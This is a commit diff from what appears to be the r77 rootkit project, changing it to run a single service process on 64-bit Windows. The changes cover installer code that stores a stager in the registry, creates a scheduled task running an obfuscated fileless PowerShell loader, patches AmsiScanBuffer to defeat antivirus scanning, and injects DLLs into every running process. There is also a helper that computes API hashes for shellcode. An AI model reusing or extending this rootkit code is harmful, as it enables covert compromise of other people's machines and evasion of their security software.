Only one service process on 64-bit OS

Author: bytecode77

$Docs/PebApiComputeHash.cpp

@@ -0,0 +1,36 @@
+#include <Windows.h>
+
+#define ROTR(value, bits) ((DWORD)(value) >> (bits) | (DWORD)(value) << (32 - (bits)))
+
+DWORD ComputeFunctionHash(LPCSTR str)
+{
+	DWORD hash = 0;
+
+	while (*str)
+	{
+		hash = ROTR(hash, 13) + *str++;
+	}
+
+	return hash;
+}
+
+DWORD ComputeModuleNameHash(LPCSTR str, USHORT length)
+{
+	DWORD hash = 0;
+
+	for (USHORT i = 0; i < length; i++)
+	{
+		hash = ROTR(hash, 13) + (str[i] >= 'a' ? str[i] - 0x20 : str[i]);
+	}
+
+	return hash;
+}
+
+int main(int argc, char *argv[])
+{
+	LPCWSTR moduleName = L"kernel32.dll";
+	LPCSTR functionName = "CreateProcessW";
+	DWORD moduleHash = ComputeModuleNameHash((LPCSTR)moduleName, lstrlenW(moduleName) * 2);
+	DWORD functionHash = ComputeFunctionHash(functionName);
+	return 0;
+}

.gitignore

@@ -19,6 +19,4 @@ TestResults/
 $Build/
 Install/Resources/
 Stager/Resources/
-Service32/Resources/
-Service64/Resources/
 Uninstall/Resources/

BuildTask/BuildTask.cs

@@ -39,8 +39,8 @@ public static int Main(string[] args)
 				if (args.Contains("-compress")) file = Compress(file);
 				if (args.Contains("-encrypt")) file = Encrypt(file);
 				if (args.Contains("-toshellcode")) file = ExtractShellCode(file);
-				if (args.Contains("-r77service")) file = R77Signature(file, Config.R77ServiceSignature);
-				if (args.Contains("-r77helper")) file = R77Signature(file, Config.R77HelperSignature);
+				if (args.Contains("-r77service")) file = R77Signature(file, R77Const.R77ServiceSignature);
+				if (args.Contains("-r77helper")) file = R77Signature(file, R77Const.R77HelperSignature);
 
 				File.WriteAllBytes(args[0], file);
 				return 0;

Example/MainWindow.xaml

@@ -30,7 +30,7 @@
 				</TextBlock>
 				<StackPanel Visibility="{Binding Message1Visibility}">
 					<TextBlock Text="This executable's filename starts with &quot;" Margin="0,0,0,10">
-						<Run Text="{x:Static global:Config.HidePrefix}" /><Run Text="&quot;" />
+						<Run Text="{x:Static global:R77Const.HidePrefix}" /><Run Text="&quot;" />
 					</TextBlock>
 					<TextBlock>
 						<Run Text="  • A task manager that is injected with r77 will not display this process." />
@@ -43,7 +43,7 @@
 				<DockPanel Visibility="{Binding Message2Visibility}">
 					<Image Source="/Example;component/Resources/Warning16.png" Margin="0,0,8,0" VerticalAlignment="Top" />
 					<TextBlock Text="Rename this executable's file to start with &quot;">
-						<Run Text="{x:Static global:Config.HidePrefix}" /><Run Text="&quot;." />
+						<Run Text="{x:Static global:R77Const.HidePrefix}" /><Run Text="&quot;." />
 						<LineBreak />
 						<Run Text="It will be hidden by r77." />
 					</TextBlock>

Example/MainWindow.xaml.cs

@@ -13,7 +13,7 @@ public partial class MainWindow : Window
 	{
 		public string FileName => Path.GetFileName(Assembly.GetEntryAssembly().Location);
 		public int ProcessId => Process.GetCurrentProcess().Id;
-		public bool HasPrefix => FileName.StartsWith(Config.HidePrefix);
+		public bool HasPrefix => FileName.StartsWith(R77Const.HidePrefix);
 		public Visibility Message1Visibility => HasPrefix ? Visibility.Visible : Visibility.Collapsed;
 		public Visibility Message2Visibility => HasPrefix ? Visibility.Collapsed : Visibility.Visible;
 

Global/R77Const.cs

@@ -1,7 +1,7 @@
 namespace Global
 {
 	// These constants must match the preprocessor definitions in r77def.h
-	public static class Config
+	public static class R77Const
 	{
 		public const string HidePrefix = "$77";
 		public const ushort R77ServiceSignature = 0x7273;

Helper/Helper.c

@@ -109,7 +109,7 @@ BOOL CreateConfigSystem()
 }
 BOOL Inject(DWORD processId, LPBYTE dll, DWORD dllSize)
 {
-	return InjectDll(processId, dll, dllSize, FALSE);
+	return InjectDll(processId, dll, dllSize);
 }
 BOOL InjectAll(LPBYTE dll32, DWORD dll32Size, LPBYTE dll64, DWORD dll64Size)
 {
@@ -123,9 +123,8 @@ BOOL InjectAll(LPBYTE dll32, DWORD dll32Size, LPBYTE dll64, DWORD dll64Size)
 
 		for (DWORD i = 0; i < processCount; i++)
 		{
-			// Try both the 32-bit and the 64-bit DLL. Either the first or the second call will succeed.
-			InjectDll(processes[i], dll32, dll32Size, TRUE);
-			InjectDll(processes[i], dll64, dll64Size, TRUE);
+			InjectDll(processes[i], dll32, dll32Size);
+			InjectDll(processes[i], dll64, dll64Size);
 		}
 
 		result = TRUE;

Install/Install.c

@@ -15,44 +15,31 @@ int main()
 	// Write stager executable to registry.
 	// This C# executable is compiled with AnyCPU and can be run by both 32-bit and 64-bit powershell.
 	// The target framework is 3.5, but it will run, even if .NET 4.x is installed and .NET 3.5 isn't.
-	// Because the powershell command may run using .NET 3.5, there is no access to a specific registry view.
-	// Therefore, the executable needs to be written to both the 32-bit and the 64-bit registry view.
 
 	HKEY key;
-	if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_ALL_ACCESS | KEY_WOW64_32KEY, &key) != ERROR_SUCCESS ||
-		RegSetValueExW(key, HIDE_PREFIX L"stager", 0, REG_BINARY, stager, stagerSize) != ERROR_SUCCESS) return 0;
-
 	if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &key) != ERROR_SUCCESS ||
 		RegSetValueExW(key, HIDE_PREFIX L"stager", 0, REG_BINARY, stager, stagerSize) != ERROR_SUCCESS) return 0;
 
 	// This powershell command loads the stager from the registry and executes it in memory using Assembly.Load().EntryPoint.Invoke()
 	// The C# binary will proceed with creating a native process using process hollowing.
 	// The powershell command is purely inline and doesn't require a ps1 file.
 
-	LPWSTR powershellCommand32 = GetPowershellCommand(FALSE);
-	LPWSTR powershellCommand64 = GetPowershellCommand(TRUE);
+	LPWSTR powershellCommand = GetPowershellCommand();
 
-	// Create 32-bit scheduled task to run the powershell stager.
+	// Create scheduled task to run the powershell stager.
 	DeleteScheduledTask(R77_SERVICE_NAME32);
-	if (CreateScheduledTask(R77_SERVICE_NAME32, Is64BitOperatingSystem() ? L"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" : L"", L"powershell", powershellCommand32))
-	{
-		RunScheduledTask(R77_SERVICE_NAME32);
-	}
+	DeleteScheduledTask(R77_SERVICE_NAME64);
 
-	// Create 64-bit scheduled task to run the powershell stager.
-	if (Is64BitOperatingSystem())
+	LPCWSTR scheduledTaskName = Is64BitOperatingSystem() ? R77_SERVICE_NAME64 : R77_SERVICE_NAME32;
+	if (CreateScheduledTask(scheduledTaskName, L"", L"powershell", powershellCommand))
 	{
-		DeleteScheduledTask(R77_SERVICE_NAME64);
-		if (CreateScheduledTask(R77_SERVICE_NAME64, L"", L"powershell", powershellCommand64))
-		{
-			RunScheduledTask(R77_SERVICE_NAME64);
-		}
+		RunScheduledTask(scheduledTaskName);
 	}
 
 	return 0;
 }
 
-LPWSTR GetPowershellCommand(BOOL is64Bit)
+LPWSTR GetPowershellCommand()
 {
 	// Powershell inline command to be invoked using powershell.exe "..."
 
@@ -90,7 +77,7 @@ LPWSTR GetPowershellCommand(BOOL is64Bit)
 			// Use Microsoft.Win32.UnsafeNativeMethods for some DllImport's.
 			L"$NativeMethods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals(`System.dll`)})"
 			L".GetType(`Microsoft.Win32.UnsafeNativeMethods`);"
-			L"$GetProcAddress=$NativeMethods.GetMethod(`GetProcAddress`,[Reflection.BindingFlags]`Public,Static`,$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);"
+			L"$GetProcAddress=$NativeMethods.GetMethod(`GetProcAddress`,[Reflection.BindingFlags](`Public,Static`),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);"
 
 			// Create delegate types
 			L"$LoadLibraryDelegate=Get-Delegate @([String])([IntPtr]);"
@@ -111,7 +98,7 @@ LPWSTR GetPowershellCommand(BOOL is64Bit)
 		);
 
 		// Overwrite AmsiScanBuffer function with shellcode to return AMSI_RESULT_CLEAN.
-		if (is64Bit)
+		if (Is64BitOperatingSystem())
 		{
 			// b8 57 00 07 80	mov		eax, 0x80070057
 			// c3				ret
@@ -144,6 +131,9 @@ LPWSTR GetPowershellCommand(BOOL is64Bit)
 
 	StrCatW(command, L"\"");
 
+	// Replace string literals that are marked with `thestring`.
+	ObfuscatePowershellStringLiterals(command);
+
 	// Obfuscate all variable names with random strings.
 	ObfuscatePowershellVariable(command, L"Get-Delegate");
 	ObfuscatePowershellVariable(command, L"ParameterTypes");
@@ -160,9 +150,6 @@ LPWSTR GetPowershellCommand(BOOL is64Bit)
 	ObfuscatePowershellVariable(command, L"AmsiScanBufferPtr");
 	ObfuscatePowershellVariable(command, L"OldProtect");
 
-	// Replace string literals that are marked with `thestring`.
-	ObfuscatePowershellStringLiterals(command);
-
 	return command;
 }
 VOID ObfuscatePowershellVariable(LPWSTR command, LPCWSTR variableName)
@@ -261,7 +248,7 @@ VOID ObfuscatePowershellStringLiterals(LPWSTR command)
 	}
 
 	// Append remaining string after the last quoted string.
-	StrNCatW(newCommand, commandPtr, lstrlenW(command) - (commandPtr - command));
+	StrCatW(newCommand, commandPtr);
 
 	StrCpyW(command, newCommand);
 	FREE(newCommand);

Install/Install.h

@@ -4,11 +4,10 @@
 /// <summary>
 /// Creates the powershell startup command.
 /// </summary>
-/// <param name="is64Bit">TRUE to return the commandline for 64-bit powershell, FALSE to return the commandline for 32-bit powershell.</param>
 /// <returns>
 /// A newly allocated LPCSTR with the powershell command.
 /// </returns>
-LPWSTR GetPowershellCommand(BOOL is64Bit);
+LPWSTR GetPowershellCommand();
 /// <summary>
 /// Obfuscates all occurrences of a given variable name within a powershell command.
 /// </summary>

Service/ControlPipeListener.c

@@ -10,7 +10,7 @@ DWORD WINAPI ControlPipeListenerThread(LPVOID parameter)
 {
 	while (TRUE)
 	{
-		HANDLE pipe = CreatePublicNamedPipe(COALESCE_BITNESS(CONTROL_PIPE_NAME, CONTROL_PIPE_REDIRECT64_NAME));
+		HANDLE pipe = CreatePublicNamedPipe(CONTROL_PIPE_NAME);
 		while (pipe != INVALID_HANDLE_VALUE)
 		{
 			if (ConnectNamedPipe(pipe, NULL))